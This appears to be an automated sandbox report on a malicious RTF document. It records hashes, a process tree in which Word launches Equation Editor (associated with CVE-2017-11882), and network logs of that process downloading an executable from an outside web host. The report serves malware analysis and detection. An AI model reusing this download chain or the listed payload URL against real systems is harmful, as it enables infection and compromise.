Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/05/2024, 06:48 UTC

General

  • Target

    409239eded911637708f859255dc90c8_JaffaCakes118.rtf

  • Size

    19KB

  • MD5

    409239eded911637708f859255dc90c8

  • SHA1

    96d1950509af3a9a94f0a9d8a16bc0284e3149f6

  • SHA256

    11ce880de1396d1d50a1240288fdc0273b7a2cd49ce6012b4f759b8831fb7e8b

  • SHA512

    03d9eea789b2392337a3fa7149de4c4e2a7c7e64929906c581525dac33690bcd61fc42de27445d3ba844eee6bab7044c9587c1540b6bd92f3c16a9db753a3efb

  • SSDEEP

    384:vHxcWi1mN0xJSA/2TjYz9G6UGFY/d7nBAWEml5IaWKDZax1:ZcLMN0xQA/2TjYzESFY/d7ltl5dWKDZQ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\409239eded911637708f859255dc90c8_JaffaCakes118.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1640
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      PID:3012

    Network

    • flag-us
      DNS
      hwy11-17-hwy582tocoughlin.com
      EQNEDT32.EXE
      Remote address:
      8.8.8.8:53
      Request
      hwy11-17-hwy582tocoughlin.com
      IN A
      Response
      hwy11-17-hwy582tocoughlin.com
      IN A
      66.96.160.130
    • flag-us
      GET
      http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      EQNEDT32.EXE
      Remote address:
      66.96.160.130:80
      Request
      GET /wp-includes/images/file/fath.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: hwy11-17-hwy582tocoughlin.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 14 May 2024 06:48:30 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 278
      Connection: keep-alive
      Server: Apache
      Location: https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      Cache-Control: max-age=3600
      Expires: Tue, 14 May 2024 07:48:30 GMT
      Age: 0
    • flag-us
      GET
      https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      EQNEDT32.EXE
      Remote address:
      66.96.160.130:443
      Request
      GET /wp-includes/images/file/fath.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Connection: Keep-Alive
      Host: hwy11-17-hwy582tocoughlin.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 14 May 2024 06:48:34 GMT
      Content-Type: text/html; charset=UTF-8
      Content-Length: 9136
      Connection: keep-alive
      Server: Apache
      X-Powered-By: PHP/7.4.10
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://hwy11-17-hwy582tocoughlin.com/wp-json/>; rel="https://api.w.org/"
      Content-Encoding: gzip
      Vary: Accept-Encoding
      Age: 3
    • 66.96.160.130:80
      http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      http
      EQNEDT32.EXE
      590 B
      746 B
      5
      3

      HTTP Request

      GET http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe

      HTTP Response

      301
    • 66.96.160.130:443
      https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      tls, http
      EQNEDT32.EXE
      1.3kB
      13.1kB
      13
      17

      HTTP Request

      GET https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe

      HTTP Response

      404
    • 8.8.8.8:53
      hwy11-17-hwy582tocoughlin.com
      dns
      EQNEDT32.EXE
      75 B
      91 B
      1
      1

      DNS Request

      hwy11-17-hwy582tocoughlin.com

      DNS Response

      66.96.160.130

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      09e67772bb243efdf9c9cc157782ab8e

      SHA1

      09d103eb237e9889f7e049be8a39d2efc4e2d53f

      SHA256

      51827371742f5140c2eef424a39b8011e87e925999c2b2859eaa722c433901f3

      SHA512

      af14a65f53b1462e44b0c9a3b47be3f2da3c74345bfbfcb30ed8912e04c57bb2614c6ac74f6ca676d63fc49969854f333619f8a3269c2ff5b109636de917aec7

    • memory/2256-0-0x000000002F541000-0x000000002F542000-memory.dmp

      Filesize

      4KB

    • memory/2256-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2256-2-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/2256-27-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/2256-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB
